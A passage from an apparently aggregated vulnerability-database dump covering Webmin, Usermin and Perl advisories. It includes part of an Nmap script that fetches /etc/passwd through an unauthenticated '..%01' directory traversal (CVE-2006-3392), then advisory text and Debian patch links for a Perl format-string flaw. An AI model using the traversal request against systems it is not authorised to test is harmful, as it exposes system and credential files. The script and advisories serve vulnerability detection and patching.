Proof of Concept:/unauthenticated/..%01/..%01/(..)/etc/passwd\n-- | References:\n-- | http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure\n-- |_ http://www.exploit-db.com/exploits/1997/\n--\n-- @args http-vuln-cve2006-3392.file <FILE>. Default: /etc/passwd\n---\n\nauthor = \"Paul AMAR <aos.paul@gmail.com>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"exploit\",\"vuln\",\"intrusive\"}\n\nportrule = shortport.portnumber({10000})\n\naction = function(host, port)\n local file_var = stdnse.get_script_args(SCRIPT_NAME .. \".file\") or \"/etc/passwd\"\n\n local vuln = {\n title = 'Webmin File Disclosure',\n state = vulns.STATE.NOT_VULN, -- default\n IDS = {CVE = 'CVE-2006-3392'},\n description = [[\nWebmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.\nThis allows arbitrary files to be read, without requiring authentication, using \"..%01\" sequences\nto bypass the removal of \"../\" directory traversal sequences.\n]],\n references = {\n 'http://www.exploit-db.com/exploits/1997/',\n 'http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure',\n },\n dates = {\n disclosure = {year = '2006', month = '06', day = '29'},\n },\n }\n\n local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)\n local url = \"/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01\" .. file_var\n\n stdnse.debug1(\"Getting \" .. file_var)\n\n local detection_session = http.get(host, port, url)\n\n stdnse.debug1(\"Status code:\"..detection_session.status)\n if detection_session and detection_session.status == 200 then\n vuln.state = vulns.STATE.EXPLOIT\n stdnse.debug1(detection_session.body)\n return vuln_report:make_output(vuln)\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:48", "bulletinFamily": "unix", "cvelist": ["CVE-2005-3962", "CVE-2005-3912"], "description": "\nThe Perl Development page reports:\n\nDyad Security recently released a security advisory explaining how\n\t in certain cases, a carefully crafted format string passed to\n\t sprintf can cause a buffer overflow. This buffer overflow can then\n\t be used by an attacker to execute code on the machine. This was\n\t discovered in the context of a design problem with the Webmin\n\t administration package that allowed a malicious user to pass\n\t unchecked data into sprintf.\n\n", "edition": 4, "modified": "2005-09-23T00:00:00", "published": "2005-09-23T00:00:00", "id": "BB33981A-7AC6-11DA-BF72-00123F589060", "href": "https://vuxml.freebsd.org/freebsd/bb33981a-7ac6-11da-bf72-00123f589060.html", "title": "perl, webmin, usermin -- perl format string integer wrap vulnerability", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T22:19:12", "description": "BUGTRAQ ID: 15629\r\nCVE(CAN) ID: CVE-2005-3962,CVE-2005-3912\r\n\r\nPerl\u662f\u4e00\u79cd\u514d\u8d39\u4e14\u529f\u80fd\u5f3a\u5927\u7684\u7f16\u7a0b\u8bed\u8a00\u3002\r\n\r\n\u7531\u4e8ePerl\u6ca1\u6709\u6b63\u786e\u7684\u5904\u7406\u683c\u5f0f\u5316\u6253\u5370\u51fd\u6570\u4e2d\u7684\u683c\u5f0f\u6307\u793a\u7b26\u5bfc\u81f4\u4e86\u683c\u5f0f\u4e32\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6b64\u6f0f\u6d1e\u5728\u4e3b\u673a\u4e0a\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\r\n\r\n\u53c2\u6570\u683c\u5f0f\u4e32\uff08%I$n\uff09\u4e2d\u7684INT_MAX\u503c\u53ef\u80fd\u5bfc\u81f4Perl_sv_vcatpvfn\u51fd\u6570\u4e2d\u7684efix\u51fa\u73b0\u6574\u6570\u6ea2\u51fa\u3002\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\u8fdc\u7a0b\u6267\u884c\u4efb\u610f\u6307\u4ee4\u6216\u5bfc\u81f4\u62d2\u7edd\u670d\u52a1\u3002\r\n\n\nLarry Wall Perl <= 5.9.2\r\nWebmin Webmin <= 1.240\r\nWebmin Usermin <= 1.170\nDebian\r\n------\r\nDebian\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08DSA-943-1\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nDSA-943-1\uff1aNew Perl packages fix arbitrary code execution\r\n\u94fe\u63a5\uff1a<a href=\"http://www.debian.org/security/2005/dsa-943\" target=\"_blank\">http://www.debian.org/security/2005/dsa-943</a>\r\n\r\n\u8865\u4e01\u4e0b\u8f7d\uff1a\r\nSource archives:\r\n\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge3.dsc\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge3.dsc</a>\r\nSize/MD5 checksum: 738 88756767017d421351e02a5226457d2b\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge3.diff.gz\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge3.diff.gz</a>\r\nSize/MD5 checksum: 87851 05a72533cd5bde5fce6987cf39041236\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4.orig.tar.gz\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4.orig.tar.gz</a>\r\nSize/MD5 checksum: 12094233 912050a9cb6b0f415b76ba56052fb4cf\r\n\r\nArchitecture independent components:\r\n\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/libcgi-fast-perl_5.8.4-8sarge3_all.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/libcgi-fast-perl_5.8.4-8sarge3_all.deb</a>\r\nSize/MD5 checksum: 38332 7d47e456c2bd7c83312bb1ad17738284\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl-doc_5.8.4-8sarge3_all.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl-doc_5.8.4-8sarge3_all.deb</a>\r\nSize/MD5 checksum: 7053372 47e14a8f071c506916e40713e8cc81f7\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl-modules_5.8.4-8sarge3_all.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl-modules_5.8.4-8sarge3_all.deb</a>\r\nSize/MD5 checksum: 2178216 4823e4985f8cf1b4af78ec26afbc0102\r\n\r\nAlpha architecture:\r\n\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge3_alpha.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge3_alpha.deb</a>\r\nSize/MD5 checksum: 805438 0e3cb34c8c093515c7b33fa60a493899\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge3_alpha.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge3_alpha.deb</a>\r\nSize/MD5 checksum: 1040 f82603c65e3f3def2356962111e411c2\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge3_alpha.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge3_alpha.deb</a>\r\nSize/MD5 checksum: 3901974 f744b7b871a8071cb403a74d665b7778\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge3_alpha.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge3_alpha.deb</a>\r\nSize/MD5 checksum: 874714 26e450d8f0375e5a3545c2988205cee4\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge3_alpha.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge3_alpha.deb</a>\r\nSize/MD5 checksum: 4133098 cf772af3fa70e0cf320b43964aeab61e\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge3_alpha.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge3_alpha.deb</a>\r\nSize/MD5 checksum: 37080 d3863820eaebcbbbe59775a1874da2eb\r\n\r\nAMD64 architecture:\r\n\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge3_amd64.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge3_amd64.deb</a>\r\nSize/MD5 checksum: 605284 c6e097980b5dec33bb340e8f4c76de19\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge3_amd64.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge3_amd64.deb</a>\r\nSize/MD5 checksum: 1030 08b7c6bb0bb58a02a254826cfee27e33\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge3_amd64.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge3_amd64.deb</a>\r\nSize/MD5 checksum: 3834144 e7f33d48427be694e994c18f7321d9e0\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge3_amd64.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge3_amd64.deb</a>\r\nSize/MD5 checksum: 791678 bdbedf5f0e3efb20181a0665d791c6de\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge3_amd64.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge3_amd64.deb</a>\r\nSize/MD5 checksum: 3934814 ed946cdd2984a538b60acbd034264947\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge3_amd64.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge3_amd64.deb</a>\r\nSize/MD5 checksum: 32852 ae96f1f115505ab983ed389dee240a83\r\n\r\nARM architecture:\r\n\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge3_arm.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge3_arm.deb</a>\r\nSize/MD5 checksum: 613158 30cd5528198d49208274e50e60611b0a\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge3_arm.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge3_arm.deb</a>\r\nSize/MD5 checksum: 1026 fc64aa8b67f46fcccb6d85db7cb242ad\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge3_arm.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge3_arm.deb</a>\r\nSize/MD5 checksum: 3132808 226a69d4fa30d1e0a40f4d761826c230\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge3_arm.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge3_arm.deb</a>\r\nSize/MD5 checksum: 737524 b4aaf84bd60fef147d1131c5ffbc6a0a\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge3_arm.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge3_arm.deb</a>\r\nSize/MD5 checksum: 3719460 8e8d12058f9f7fb9e153d4c3ff79d0f4\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge3_arm.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge3_arm.deb</a>\r\nSize/MD5 checksum: 29880 faa9dc0401eb667e202e12f2d2cf9643\r\n\r\nIntel IA-32 architecture:\r\n\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge3_i386.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge3_i386.deb</a>\r\nSize/MD5 checksum: 567048 8488e40844019795a1179a2b9a74f172\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge3_i386.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge3_i386.deb</a>\r\nSize/MD5 checksum: 508818 66f7900d63a2efb0a787e83186613a98\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge3_i386.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge3_i386.deb</a>\r\nSize/MD5 checksum: 3237948 5841d065408022fb2fe0e75febc02d9d\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge3_i386.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge3_i386.deb</a>\r\nSize/MD5 checksum: 751956 b77e882ed9558a09398c2fba334e5b4a\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge3_i386.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge3_i386.deb</a>\r\nSize/MD5 checksum: 3735798 bb034b2e756aa35cd5fa9e01a0485b13\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge3_i386.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge3_i386.deb</a>\r\nSize/MD5 checksum: 31696 d2c9b1fbc10e89e7868e16fb4c97700d\r\n\r\nIntel IA-64 architecture:\r\n\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge3_ia64.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge3_ia64.deb</a>\r\nSize/MD5 checksum: 866818 3419fdaff605b7ddd485a205c1dd1661\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge3_ia64.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge3_ia64.deb</a>\r\nSize/MD5 checksum: 1030 c41835cc5573c0e53610e79766b88d11\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge3_ia64.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge3_ia64.deb</a>\r\nSize/MD5 checksum: 4027834 28436948c3dd298ad38b3c46f69f2cb4\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge3_ia64.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge3_ia64.deb</a>\r\nSize/MD5 checksum: 1046750 1a70c30abb13449d00a2b34c17c79f17\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge3_ia64.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge3_ia64.deb</a>\r\nSize/MD5 checksum: 4534216 49cdfeada4c40365e2392a768739d706\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge3_ia64.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge3_ia64.deb</a>\r\nSize/MD5 checksum: 50104 770378e5ac290729b2943d956cad9c57\r\n\r\nHP Precision architecture:\r\n\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge3_hppa.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge3_hppa.deb</a>\r\nSize/MD5 checksum: 654878 5f8ad153b0a27e9190e5b754e8174ee7\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge3_hppa.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge3_hppa.deb</a>\r\nSize/MD5 checksum: 1032 4de6d72cf1f61d6754475a0dd1fe4561\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge3_hppa.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge3_hppa.deb</a>\r\nSize/MD5 checksum: 3918544 0f83d76853299d10f98842b15b8e7db1\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge3_hppa.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge3_hppa.deb</a>\r\nSize/MD5 checksum: 867566 cb3a0eb20c71bd8017853de9ea838f7f\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge3_hppa.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge3_hppa.deb</a>\r\nSize/MD5 checksum: 3911882 fd55c787eb9f30f2e143fac490ea4198\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge3_hppa.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge3_hppa.deb</a>\r\nSize/MD5 checksum: 34484 e3df6ab97d5e68cbb6346240e4532efc\r\n\r\nMotorola 680x0 architecture:\r\n\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge3_m68k.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge3_m68k.deb</a>\r\nSize/MD5 checksum: 457778 f25f1ebbbb4a5ce7b7a4a79c6256987e\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge3_m68k.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge3_m68k.deb</a>\r\nSize/MD5 checksum: 1040 9882ea5db94e569a35209a66c74bb390\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge3_m68k.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge3_m68k.deb</a>\r\nSize/MD5 checksum: 3815032 321dd2b80abad424b678f260d18f323a\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge3_m68k.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge3_m68k.deb</a>\r\nSize/MD5 checksum: 692196 733bfa10857d842bd907f408b03a8b3d\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge3_m68k.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge3_m68k.deb</a>\r\nSize/MD5 checksum: 3008672 81a0d0613ebe7b9affcd56174e1f955c\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge3_m68k.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge3_m68k.deb</a>\r\nSize/MD5 checksum: 27934 68de12bace4cf3de7a339b25119b1611\r\n\r\nBig endian MIPS architecture:\r\n\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge3_mips.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge3_mips.deb</a>\r\nSize/MD5 checksum: 657066 7e2c9980c630b3aa1e60348a4998665a\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge3_mips.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge3_mips.deb</a>\r\nSize/MD5 checksum: 1032 3da5c1e82b6194beac8fe7020a38d7a3\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge3_mips.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge3_mips.deb</a>\r\nSize/MD5 checksum: 3384320 edfa53822abb7626b2bfd6ac4d5923df\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge3_mips.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge3_mips.deb</a>\r\nSize/MD5 checksum: 781078 f4a7b2e1bbd95c9381503b382d35ba58\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge3_mips.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge3_mips.deb</a>\r\nSize/MD5 checksum: 4017490 ddca3a084b7c9f1b841bd3f93e39a1d0\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge3_mips.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge3_mips.deb</a>\r\nSize/MD5 checksum: 32314 51f707f1c1d3df1c3ad05dc545512c10\r\n\r\nLittle endian MIPS architecture:\r\n\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge3_mipsel.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge3_mipsel.deb</a>\r\nSize/MD5 checksum: 653526 e7a527c0ed8475df75b3803690081445\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge3_mipsel.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge3_mipsel.deb</a>\r\nSize/MD5 checksum: 1038 e7b83c957a6c6822ee5614574653d80e\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge3_mipsel.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge3_mipsel.deb</a>\r\nSize/MD5 checksum: 3125384 4446da60977e961ca64ec93a331b0803\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge3_mipsel.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge3_mipsel.deb</a>\r\nSize/MD5 checksum: 781672 14e3d605298699dc99e2e5e20310c6b2\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge3_mipsel.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge3_mipsel.deb</a>\r\nSize/MD5 checksum: 3967890 3ab0c5407e2b5816ad55e47d7c256869\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge3_mipsel.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge3_mipsel.deb</a>\r\nSize/MD5 checksum: 32434 4f171621c453755b731ce34bad930a62\r\n\r\nPowerPC architecture:\r\n\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge3_powerpc.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge3_powerpc.deb</a>\r\nSize/MD5 checksum: 625118 41b2364e5073cd1e177fd6c3e5f455c5\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge3_powerpc.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge3_powerpc.deb</a>\r\nSize/MD5 checksum: 1038 2d18de4839ef016646127f4a104f17a1\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge3_powerpc.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge3_powerpc.deb</a>\r\nSize/MD5 checksum: 3509324 77fe7a0288d42bbe7abc9357682cdc1b\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge3_powerpc.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge3_powerpc.deb</a>\r\nSize/MD5 checksum: 790116 9e189589ef99e78d0f0ddef4fb06440e\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge3_powerpc.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge3_powerpc.deb</a>\r\nSize/MD5 checksum: 3701264 886260a4033209be2431ff908cc032e5\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge3_powerpc.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge3_powerpc.deb</a>\r\nSize/MD5 checksum: 33582 ec48dc685b7ac64fb722458e0954edc8\r\n\r\nIBM S/390 architecture:\r\n\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge3_s390.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge3_s390.deb</a>\r\nSize/MD5 checksum: 604116 a2e6f8ee63267dfcf3df2e05f92ce958\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge3_s390.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge3_s390.deb</a>\r\nSize/MD5 checksum: 1032 4d6c1ce7b2f9789fc31cc2440f39a832\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge3_s390.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge3_s390.deb</a>\r\nSize/MD5 checksum: 3819738 c9523a97cd0716e67821dd6e7508615f\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge3_s390.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge3_s390.deb</a>\r\nSize/MD5 checksum: 800132 ebfc849dbaf0be2afa771a3d5b632467\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge3_s390.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge3_s390.deb</a>\r\nSize/MD5 checksum: 4234804 30fcc4ea55599b8365a0f96153755466\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge3_s390.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge3_s390.deb</a>\r\nSize/MD5 checksum: 33244 a55373a563d2546d1286f7fb4de11710\r\n\r\nSun Sparc architecture:\r\n\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge3_sparc.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge3_sparc.deb</a>\r\nSize/MD5 checksum: 582422 8ec81b47b82fdb3602c42c6fa0559793\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge3_sparc.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge3_sparc.deb</a>\r\nSize/MD5 checksum: 1038 ebbf066210ca33b4282cf347cc771cca\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge3_sparc.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge3_sparc.deb</a>\r\nSize/MD5 checksum: 3547312 a609080c2c788fd382f970c21b22d9e7\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge3_sparc.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge3_sparc.deb</a>\r\nSize/MD5 checksum: 775666 0e0a56ce4bb224e7bc96ea68ac741d8b\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge3_sparc.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge3_sparc.deb</a>\r\nSize/MD5 checksum: 3840718 e9ded2d7974b51fbf7933b455b45b604\r\n<a href=\"http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge3_sparc.deb\" target=\"_blank\">http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge3_sparc.deb</a>\r\nSize/MD5 checksum: 31034 